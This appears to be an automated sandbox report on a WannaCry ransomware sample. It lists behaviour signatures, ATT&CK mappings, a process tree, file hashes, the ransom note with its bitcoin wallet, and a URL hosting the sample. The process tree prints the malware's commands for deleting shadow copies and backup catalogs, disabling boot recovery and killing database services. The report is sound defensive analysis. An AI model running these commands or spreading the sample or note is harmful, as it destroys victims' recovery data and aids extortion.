wannacry | hxxps://github[.]com/cryptwareapps/Malware-Database/blob/main/Malware/Ransomware/WannaCry[.]exe

Analysis

max time kernel
111s
max time network
107s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
21-07-2024 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/cryptwareapps/Malware-Database/blob/main/Malware/Ransomware/WannaCry.exe

Score

10^/10

wannacry defense_evasion execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB44.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB6A.tmp	WannaCry.exe

Executes dropped EXE 5 IoCs

pid	Process
1984	WannaCry.exe
3456	!WannaDecryptor!.exe
4544	!WannaDecryptor!.exe
3088	!WannaDecryptor!.exe
1956	!WannaDecryptor!.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
33	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2424	taskkill.exe
420	taskkill.exe
2560	taskkill.exe
2772	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 4183.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3764	msedge.exe
3764	msedge.exe
1916	msedge.exe
1916	msedge.exe
3908	msedge.exe
3908	msedge.exe
1832	identity_helper.exe
1832	identity_helper.exe
4836	msedge.exe
4836	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	420	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4540	WMIC.exe
Token: SeSecurityPrivilege	4540	WMIC.exe
Token: SeTakeOwnershipPrivilege	4540	WMIC.exe
Token: SeLoadDriverPrivilege	4540	WMIC.exe
Token: SeSystemProfilePrivilege	4540	WMIC.exe
Token: SeSystemtimePrivilege	4540	WMIC.exe
Token: SeProfSingleProcessPrivilege	4540	WMIC.exe
Token: SeIncBasePriorityPrivilege	4540	WMIC.exe
Token: SeCreatePagefilePrivilege	4540	WMIC.exe
Token: SeBackupPrivilege	4540	WMIC.exe
Token: SeRestorePrivilege	4540	WMIC.exe
Token: SeShutdownPrivilege	4540	WMIC.exe
Token: SeDebugPrivilege	4540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4540	WMIC.exe
Token: SeRemoteShutdownPrivilege	4540	WMIC.exe
Token: SeUndockPrivilege	4540	WMIC.exe
Token: SeManageVolumePrivilege	4540	WMIC.exe
Token: 33	4540	WMIC.exe
Token: 34	4540	WMIC.exe
Token: 35	4540	WMIC.exe
Token: 36	4540	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4540	WMIC.exe
Token: SeSecurityPrivilege	4540	WMIC.exe
Token: SeTakeOwnershipPrivilege	4540	WMIC.exe
Token: SeLoadDriverPrivilege	4540	WMIC.exe
Token: SeSystemProfilePrivilege	4540	WMIC.exe
Token: SeSystemtimePrivilege	4540	WMIC.exe
Token: SeProfSingleProcessPrivilege	4540	WMIC.exe
Token: SeIncBasePriorityPrivilege	4540	WMIC.exe
Token: SeCreatePagefilePrivilege	4540	WMIC.exe
Token: SeBackupPrivilege	4540	WMIC.exe
Token: SeRestorePrivilege	4540	WMIC.exe
Token: SeShutdownPrivilege	4540	WMIC.exe
Token: SeDebugPrivilege	4540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4540	WMIC.exe
Token: SeRemoteShutdownPrivilege	4540	WMIC.exe
Token: SeUndockPrivilege	4540	WMIC.exe
Token: SeManageVolumePrivilege	4540	WMIC.exe
Token: 33	4540	WMIC.exe
Token: 34	4540	WMIC.exe
Token: 35	4540	WMIC.exe
Token: 36	4540	WMIC.exe
Token: SeBackupPrivilege	4100	vssvc.exe
Token: SeRestorePrivilege	4100	vssvc.exe
Token: SeAuditPrivilege	4100	vssvc.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe
1916	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
4064	MiniSearchHost.exe
3456	!WannaDecryptor!.exe
3456	!WannaDecryptor!.exe
4544	!WannaDecryptor!.exe
4544	!WannaDecryptor!.exe
3088	!WannaDecryptor!.exe
3088	!WannaDecryptor!.exe
1956	!WannaDecryptor!.exe
1956	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 1532	1916	msedge.exe	81
PID 1916 wrote to memory of 1532	1916	msedge.exe	81
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3860	1916	msedge.exe	82
PID 1916 wrote to memory of 3764	1916	msedge.exe	83
PID 1916 wrote to memory of 3764	1916	msedge.exe	83
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84
PID 1916 wrote to memory of 1084	1916	msedge.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/cryptwareapps/Malware-Database/blob/main/Malware/Ransomware/WannaCry.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc043c3cb8,0x7ffc043c3cc8,0x7ffc043c3cd8
  2⤵
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6300 /prefetch:8
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,15907610933682522964,83860281443208332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6552 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4836
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 228071721577688.bat
    3⤵
    PID:336
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      PID:3852
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    PID:2420
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3088
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:3504
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious use of SetWindowsHookEx
    PID:1956

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:952

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3516

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c1ff2a88b65e524450bf7c721960d7db

SHA1
382c798fcd7782c424d93262d79e625fcb5f84aa

SHA256
2d12365f3666f6e398456f0c441317bc8ad3e7b089feacc14756e2ae87379409

SHA512
f19c08edf1416435a7628064d85f89c643c248d0979ece629b882f600956f0d8cd93efbe253fa3ec61ad205233a8804807600f845e53e5ed8949290b80fe42d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
562b59fd3a3527ef4e850775b15d0836

SHA1
ffd14d901f78138fc2eece97c5e258b251bc6752

SHA256
0a64863cb40f9d3b13a7b768b62e8b4707dfee1d3e86a07e999acb87bd7d3430

SHA512
ef9fd3d83ab85b18cf0e0d17e2c7d71936f783e3ae38005e5c78742560332f88be7c4c936d4dc4179e93fde0240d2882d71ef7038289c8cbddbfc4790c0603c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
37KB

MD5
f379276efec34127fed6f06101a024d3

SHA1
279e8e9dc86c622343e5bba17043d893c9224086

SHA256
1f92cc266344c34ab3ba73fd7107c0b7d53de896e47f3683c9e7ea4b1e74b8cf

SHA512
a87e994179341eedf39393fd4b7a57e8ac341f43bcd846c3bc16da9632921c08566be9ccb1b3afc0a1b9a9152c6a1339bff584401aaeb7f1cff7a36af66db5a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
37KB

MD5
f9a90d58144602c12373f3a51ae11c3e

SHA1
50930fadc719a0cf689f480f053fe55eaab64817

SHA256
477adbd55274ba5f7057f114fd4c4908fe46d7f486c7cd6dfe452a80ff0b7c82

SHA512
0f06561a943bdafdc0f6355ce4a5dd2a3daa348d621ac8c0d95632d5bf0458b4068803af0f3e9819496ed750299a63e6eea88c53bd2816c757a0e4c721d7e4f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
853075e14599ba81a9ba3257d987507d

SHA1
311d4e120f6e520b52d2b228fd2791ec1f867462

SHA256
a0aad9684d49172539ae30e3ed1dc465525d8c2535debed674fd078eb894bceb

SHA512
2076d843cba1428ba9f94c24f7cbad80e9225e1e550d49b003ec506b36e13177ebe0bb87b377b5248abbd40205753e436b8be383dc8166b66e15f709b264cf1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
0a8a7c3dafeb4ad3d8cb846fc95b8f1c

SHA1
69e2b994e6882e1e783410dae53181984050fa13

SHA256
a88495f2c1c26c6c1d5690a29289467c8bb8a94bf6f4801d2c14da1456773f90

SHA512
2e59b4cd4cf6f86537aae4ae88e56e21abcff5070c5c1d1d2105a8e863523c80740438cc36b2b57672bc7bb7fb9387896135afcce534edfd4697fecf61031a5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c0cecd8de6ba3d58e36a67a177b8da79

SHA1
d92667ee4bcb70fefc2cb699d496cd13578dea6a

SHA256
a5ec4b4ae8e2c69c0219ba31f7ef0d4ea81c619875b3b51da0ee34df261e84a6

SHA512
1db90abbae7290cf04f54667f50a90a523f4bc8309535a44efe0130de169b4dd74b96f38a06933183d8ffb8c2ef4fbc442a02bb6cd624aefd8a5ca64a8a4c9a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
12b057ff1e5eb3b625f38b51417ec093

SHA1
495a318d0201d6b64573593e06d644534a300907

SHA256
6aca4b2d43ec32e2ec1ccfa8c4951ede7ebb08e497242ac5467f0d94cf721f8c

SHA512
5c400345842f060b6321e30612477723b2d605091aed8cc90960816effb93ab249b6a66df7ee8e0ccb758225dd10d3ae944c417a50170afc98eda4273066d0d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a8cd532fc152968c4a43143a255f2277

SHA1
68d595b35ae7a84c081a9e465c73e2393330f348

SHA256
08d4fe97b0130c933d59ce7c525408406cdd983b2db1057d481f4cf2e3033b59

SHA512
ca3e551024ccf49218d2dbcda32018572b76ec8c943c2ffbf1d7e06a20a941124ad3aa8301d81eb51030906c5134e2341088cb6e7d0d998089c5d62f72dfde50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
62900d148ca268b84b0a30ff13444b51

SHA1
401def966c754e1ccef1e75fc3a329617e70b51c

SHA256
bdcd705ecacf3f5932387ebeece24da67244186f02fe0982fb015c8696d89b4a

SHA512
c171c344846fd24fc3aa1a885db7721b7adaa8861dd69e9fbc0513ed0a9ad2c923c80f6dfed85268a3e21e21489e5193283493c03f68611714e93685078eb9a4

Download Submit
